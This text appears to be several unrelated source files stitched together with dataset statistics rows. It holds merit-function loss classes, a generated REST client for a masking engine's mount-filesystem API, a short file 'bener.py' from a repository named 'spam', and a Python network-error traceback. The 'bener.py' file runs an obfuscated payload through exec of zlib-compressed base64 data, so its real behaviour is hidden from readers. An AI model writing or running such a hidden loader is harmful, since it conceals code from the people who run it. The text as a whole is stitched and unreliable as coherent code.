center_dist_term = self.center_dist(new_point=new_point, center=center)
# compute the penalty term
error = self.sum_sq_norms(params=new_point)
merit_term = self.mu * np.max(np.array([0, error - M_alpha]))
return -center_dist_term + merit_term
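As a numeric sanity check of the penalty logic in `__call__` above: the merit term vanishes while the squared-residual error stays within the bound `M_alpha`, and grows linearly in `mu` beyond it. This sketch uses the built-in `max`, which is equivalent to the `np.max(np.array([...]))` form used in the class:

```python
def merit_term(mu, error, M_alpha):
    # mu * max(0, error - M_alpha), as computed in MeritFunc.__call__
    return mu * max(0.0, error - M_alpha)

print(merit_term(mu=10.0, error=0.5, M_alpha=1.0))  # 0.0 (inside the bound, no penalty)
print(merit_term(mu=10.0, error=1.5, M_alpha=1.0))  # 5.0 (overshoot of 0.5, scaled by mu)
```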
class DifferentaibleMeritFunc(AbstractLoss):
def __init__(self, forward_model, mu, data, qoi_func):
"""
Dimension key:
n : number of data points
d : dimension of each data point
m : dimension of the qoi
Parameters:
-----------
forward_model (BaseModel) : see base_model.py
mu (float) : merit function parameter
data (np arr) : array of observed data - n x d
qoi_func (function) : maps theta |-> qoi, R^n -> R^m
"""
self.forward_model = forward_model
self.mu = mu
self.data = data
self.qoi_func = qoi_func
def sum_sq_norms(self, params):
"""
Finds the squared 2-norm of the difference between model and data
Dimension key:
p : dimension of model parameters
Parameters:
-----------
params (jax DeviceArray) : p
Returns:
--------
        squared 2-norm of residuals
"""
diffs_squared = jnp.square(self.data - self.forward_model(params))
return jnp.sum(diffs_squared)
def center_dist(self, new_point, center):
"""
Finds the squared 2-norm between a new proposed parameter value and
the current center
Dimension key:
p : dimension of model parameters
Parameters:
-----------
new_point (jax DeviceArray) : p
center (jax DeviceArray) : m
Returns:
--------
squared 2-norm of distance between two points
"""
diffs_squared = jnp.square(self.qoi_func(new_point) - center)
return jnp.sum(diffs_squared)
def __call__(self, new_point, center, M_alpha):
"""
Evaluates the objective function at some new point.
Dimension key:
p : dimension of model parameters
m : dimension of the QoI
Parameters:
-----------
new_point (jax.numpy.DeviceArray) : p
center (np arr) : m
M_alpha (float) : bound on the error
Returns:
--------
Objective function
"""
center_dist_term = self.center_dist(new_point, center)
error = self.sum_sq_norms(params=new_point)
constraint = self.mu * jnp.max(jnp.array([error - M_alpha, 0]))
return -center_dist_term + constraint
class MeritFunc_NEW(AbstractLoss):
def __init__(self, forward_model, mu, data_y, data_x):
"""
Dimension key:
n : number of data points
dx : dimension of each input
dy : dimension of each output
Parameters:
-----------
forward_model (BaseModel) : see base_model.py
mu (float) : merit function parameter
data_y (np arr) : array of observed output - n x dy
data_x (np arr) : array of observed input - n x dx
"""
self.forward_model = forward_model
self.mu = mu
self.data_y = data_y
self.data_x = data_x
    def sum_sq_norms(self):
        """
        Finds the squared 2-norm of the difference between the model output on
        the observed inputs and the observed outputs. Uses self.data_x and
        self.data_y directly, so it takes no arguments.

        Returns:
        --------
        squared 2-norm of residuals
        """
diffs = self.data_y - self.forward_model(self.data_x)
return np.square(diffs).sum()
def center_dist(self, new_point, center):
"""
Finds the squared 2-norm between a new proposed parameter value and
the current center
Dimension key:
p : dimension of model parameters
Parameters:
-----------
new_point (np arr) : p
center (np arr) : p
Returns:
--------
squared 2-norm of distance between two points
"""
return np.linalg.norm(new_point - center) ** 2
def __call__(self, new_point, center, M_alpha):
"""
Evaluates the objective function at some new point.
Dimension key:
p : dimension of model parameters
Parameters:
-----------
new_point (np arr) : p
center (np arr) : p
M_alpha (float) : bound on the error
Returns:
--------
Objective function
"""
# find the distance from center
center_dist_term = self.center_dist(new_point=new_point, center=center)
# compute the penalty term
        error = self.sum_sq_norms()
merit_term = self.mu * np.max(np.array([0, error - M_alpha]))
return -center_dist_term + merit_term
| 28.318182 | 80 | 0.544512 | 934 | 8,099 | 4.567452 | 0.139186 | 0.048758 | 0.039381 | 0.046414 | 0.83685 | 0.8188 | 0.799578 | 0.771917 | 0.746132 | 0.746132 | 0 | 0.006193 | 0.36202 | 8,099 | 285 | 81 | 28.417544 | 0.819431 | 0.50179 | 0 | 0.639344 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003509 | 0 | 1 | 0.245902 | false | 0.032787 | 0.04918 | 0 | 0.508197 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
8d3aebd6e61ac7ee86782ef92c7611cf196b9bc9 | 31,913 | py | Python | dxm/lib/masking_api/api/mount_filesystem_api.py | experiortec/dxm-toolkit | b2ab6189e163c62fa8d7251cd533d2a36430d44a | [
"Apache-2.0"
] | 5 | 2018-08-23T15:47:05.000Z | 2022-01-19T23:38:18.000Z | dxm/lib/masking_api/api/mount_filesystem_api.py | experiortec/dxm-toolkit | b2ab6189e163c62fa8d7251cd533d2a36430d44a | [
"Apache-2.0"
] | 59 | 2018-10-15T10:37:00.000Z | 2022-03-22T20:49:25.000Z | dxm/lib/masking_api/api/mount_filesystem_api.py | experiortec/dxm-toolkit | b2ab6189e163c62fa8d7251cd533d2a36430d44a | [
"Apache-2.0"
] | 12 | 2019-03-08T19:59:13.000Z | 2021-12-16T03:28:04.000Z | # coding: utf-8
"""
Masking API
Schema for the Masking Engine API # noqa: E501
OpenAPI spec version: 5.1.8
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from dxm.lib.masking_api.api_client import ApiClient
class MountFilesystemApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def connect_mount_filesystem(self, mount_id, **kwargs): # noqa: E501
"""Connect filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.connect_mount_filesystem(mount_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to connect (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.connect_mount_filesystem_with_http_info(mount_id, **kwargs) # noqa: E501
else:
(data) = self.connect_mount_filesystem_with_http_info(mount_id, **kwargs) # noqa: E501
return data
def connect_mount_filesystem_with_http_info(self, mount_id, **kwargs): # noqa: E501
"""Connect filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.connect_mount_filesystem_with_http_info(mount_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to connect (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['mount_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method connect_mount_filesystem" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'mount_id' is set
if self.api_client.client_side_validation and ('mount_id' not in params or
params['mount_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `mount_id` when calling `connect_mount_filesystem`") # noqa: E501
collection_formats = {}
path_params = {}
if 'mount_id' in params:
path_params['mountID'] = params['mount_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/mount-filesystem/{mountID}/connect', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MountInformation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_mount_filesystem(self, body, **kwargs): # noqa: E501
"""Create filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_mount_filesystem(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param MountInformation body: The filesystem to mount (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_mount_filesystem_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_mount_filesystem_with_http_info(body, **kwargs) # noqa: E501
return data
def create_mount_filesystem_with_http_info(self, body, **kwargs): # noqa: E501
"""Create filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_mount_filesystem_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param MountInformation body: The filesystem to mount (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_mount_filesystem" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `create_mount_filesystem`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/mount-filesystem', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MountInformation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_mount_filesystem(self, mount_id, **kwargs): # noqa: E501
"""Delete filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_mount_filesystem(mount_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_mount_filesystem_with_http_info(mount_id, **kwargs) # noqa: E501
else:
(data) = self.delete_mount_filesystem_with_http_info(mount_id, **kwargs) # noqa: E501
return data
def delete_mount_filesystem_with_http_info(self, mount_id, **kwargs): # noqa: E501
"""Delete filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_mount_filesystem_with_http_info(mount_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['mount_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_mount_filesystem" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'mount_id' is set
if self.api_client.client_side_validation and ('mount_id' not in params or
params['mount_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `mount_id` when calling `delete_mount_filesystem`") # noqa: E501
collection_formats = {}
path_params = {}
if 'mount_id' in params:
path_params['mountID'] = params['mount_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/mount-filesystem/{mountID}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def disconnect_mount_filesystem(self, mount_id, **kwargs): # noqa: E501
"""Disconnect filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.disconnect_mount_filesystem(mount_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to disconnect (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.disconnect_mount_filesystem_with_http_info(mount_id, **kwargs) # noqa: E501
else:
(data) = self.disconnect_mount_filesystem_with_http_info(mount_id, **kwargs) # noqa: E501
return data
def disconnect_mount_filesystem_with_http_info(self, mount_id, **kwargs): # noqa: E501
"""Disconnect filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.disconnect_mount_filesystem_with_http_info(mount_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to disconnect (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['mount_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method disconnect_mount_filesystem" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'mount_id' is set
if self.api_client.client_side_validation and ('mount_id' not in params or
params['mount_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `mount_id` when calling `disconnect_mount_filesystem`") # noqa: E501
collection_formats = {}
path_params = {}
if 'mount_id' in params:
path_params['mountID'] = params['mount_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/mount-filesystem/{mountID}/disconnect', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MountInformation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_mounts(self, **kwargs): # noqa: E501
"""Get all mounts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_mounts(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: The page number for which to get mount information. This will default to the first page if excluded
:param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
:return: MountInformationList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_mounts_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_mounts_with_http_info(**kwargs) # noqa: E501
return data
def get_all_mounts_with_http_info(self, **kwargs): # noqa: E501
"""Get all mounts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_mounts_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: The page number for which to get mount information. This will default to the first page if excluded
:param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
:return: MountInformationList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_number', 'page_size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_mounts" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page_number' in params:
query_params.append(('page_number', params['page_number'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/mount-filesystem', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MountInformationList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_mount_by_id(self, mount_id, **kwargs): # noqa: E501
"""Get mount by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mount_by_id(mount_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to get (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_mount_by_id_with_http_info(mount_id, **kwargs) # noqa: E501
else:
(data) = self.get_mount_by_id_with_http_info(mount_id, **kwargs) # noqa: E501
return data
def get_mount_by_id_with_http_info(self, mount_id, **kwargs): # noqa: E501
"""Get mount by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mount_by_id_with_http_info(mount_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to get (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['mount_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_mount_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'mount_id' is set
if self.api_client.client_side_validation and ('mount_id' not in params or
params['mount_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `mount_id` when calling `get_mount_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'mount_id' in params:
path_params['mountID'] = params['mount_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/mount-filesystem/{mountID}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MountInformation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remount_mount_filesystem(self, mount_id, body, **kwargs): # noqa: E501
"""Remount filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remount_mount_filesystem(mount_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to update (required)
:param MountInformation body: The updated filesystem (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.remount_mount_filesystem_with_http_info(mount_id, body, **kwargs) # noqa: E501
else:
(data) = self.remount_mount_filesystem_with_http_info(mount_id, body, **kwargs) # noqa: E501
return data
def remount_mount_filesystem_with_http_info(self, mount_id, body, **kwargs): # noqa: E501
"""Remount filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remount_mount_filesystem_with_http_info(mount_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to update (required)
:param MountInformation body: The updated filesystem (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['mount_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remount_mount_filesystem" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'mount_id' is set
if self.api_client.client_side_validation and ('mount_id' not in params or
params['mount_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `mount_id` when calling `remount_mount_filesystem`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `remount_mount_filesystem`") # noqa: E501
collection_formats = {}
path_params = {}
if 'mount_id' in params:
path_params['mountID'] = params['mount_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/mount-filesystem/{mountID}/remount', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MountInformation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_mount_filesystem(self, mount_id, body, **kwargs): # noqa: E501
"""Update filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_mount_filesystem(mount_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to update (required)
:param MountInformation body: The updated filesystem (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_mount_filesystem_with_http_info(mount_id, body, **kwargs) # noqa: E501
else:
(data) = self.update_mount_filesystem_with_http_info(mount_id, body, **kwargs) # noqa: E501
return data
def update_mount_filesystem_with_http_info(self, mount_id, body, **kwargs): # noqa: E501
"""Update filesystem mount # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_mount_filesystem_with_http_info(mount_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int mount_id: The ID of the mount to update (required)
:param MountInformation body: The updated filesystem (required)
:return: MountInformation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['mount_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_mount_filesystem" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'mount_id' is set
if self.api_client.client_side_validation and ('mount_id' not in params or
params['mount_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `mount_id` when calling `update_mount_filesystem`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `update_mount_filesystem`") # noqa: E501
collection_formats = {}
path_params = {}
if 'mount_id' in params:
path_params['mountID'] = params['mount_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/mount-filesystem/{mountID}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MountInformation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 40.142138 | 142 | 0.609062 | 3,684 | 31,913 | 5.010043 | 0.04696 | 0.046378 | 0.024273 | 0.031208 | 0.960069 | 0.959582 | 0.948204 | 0.937314 | 0.932167 | 0.929891 | 0 | 0.01487 | 0.304578 | 31,913 | 794 | 143 | 40.192695 | 0.816789 | 0.315796 | 0 | 0.81106 | 1 | 0 | 0.180413 | 0.052746 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039171 | false | 0 | 0.009217 | 0 | 0.105991 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8d5783e3a968024ee1976594fb9c6cbdc718ffd5 | 662 | py | Python | dll/bener.py | syahricogan/spam | 037b1a497f313e75502ea091058cbd8a6d44f4f2 | [
"Apache-2.0"
] | 2 | 2021-01-17T03:52:35.000Z | 2021-03-02T18:51:12.000Z | dll/bener.py | syahricogan/spam | 037b1a497f313e75502ea091058cbd8a6d44f4f2 | [
"Apache-2.0"
] | null | null | null | dll/bener.py | syahricogan/spam | 037b1a497f313e75502ea091058cbd8a6d44f4f2 | [
"Apache-2.0"
] | 5 | 2021-01-18T16:31:59.000Z | 2021-07-12T06:08:53.000Z | import marshal,zlib,base64
exec(zlib.decompress(base64.b64decode("eJzVVMFKw0AQvecrhirYCk1OovRWBHurop40EtPa2thmU2KKaBOQnj1U2GIRBVEvgke/aL/EmdlsquIH6JLMzM68N292CenGUQgXfixsMhCEwyhOYNVagupqFdrRSSBOazBKutUNylgnnS60RFyu1CwYxoFIoNwtlUrWuN8RGeDyeBUBRRiDXiahPZIiItkrOuFCqokYAThsQedc2mMpBaOUQpk5mMI49bwKOge8nIUbZDl5YJTAs0np2NZ5DB3ieIaFjUgpNaRcySUS9fdSHodZNJTrgc65Tl4qlFx9fHslZZ+y40HNpnBg5dczDsJMzaSaTdXsTsl3ADRjX5xlv1RvlLxWcooIHSCAkN8RU7Y5tJDRuCfGvSg5IZ0Jtf9efaE0vUo+sMzcDHEL+HJhYsqvP07xhpA3JT9Yel4E+Wk05p6E5RcExcUE9zzfI9eksQS1mH39/Mcf/BRGIjtcPoL6KOlFMV5NDcb9QGS7/mXPFw1fXC0wTT/0YW+zwNQHg+39nUW9ESS9UWvRo5ckw/Oa45xy3m5HoaPbHqyvLVhbfrvTiqJ+oVwnCDTqzYN/cov4c6lYn+cTJdE="))) | 331 | 635 | 0.953172 | 26 | 662 | 24.269231 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.127273 | 0.003021 | 662 | 2 | 635 | 331 | 0.828788 | 0 | 0 | 0 | 0 | 0.5 | 0.892911 | 0.892911 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
8d68c5b57b8d32eecf44653744baf367dbfb01d8 | 14,387 | py | Python | poloniex_orderbook_error.py | nateGeorge/crypto_predict | 5058af6d389cc06d40e21a663eff3901511198c0 | [
"Apache-2.0"
] | null | null | null | poloniex_orderbook_error.py | nateGeorge/crypto_predict | 5058af6d389cc06d40e21a663eff3901511198c0 | [
"Apache-2.0"
] | null | null | null | poloniex_orderbook_error.py | nateGeorge/crypto_predict | 5058af6d389cc06d40e21a663eff3901511198c0 | [
"Apache-2.0"
] | null | null | null | saving BTC_RADS
retrieving orderbooks...
HTTPSConnectionPool(host='poloniex.com', port=443): Max retries excee)
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
(self.host, self.port), self.timeout, **extra_kw)
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/connection
for res in socket.getaddrinfo(host, port, family, socket.SOCK_STR:
File "/usr/lib/python3.5/socket.py", line 732, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, f:
socket.gaierror: [Errno -3] Temporary failure in name resolution
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
chunked=chunked)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpoolt
self._validate_conn(conn)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
conn.connect()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"t
conn = self._new_conn()
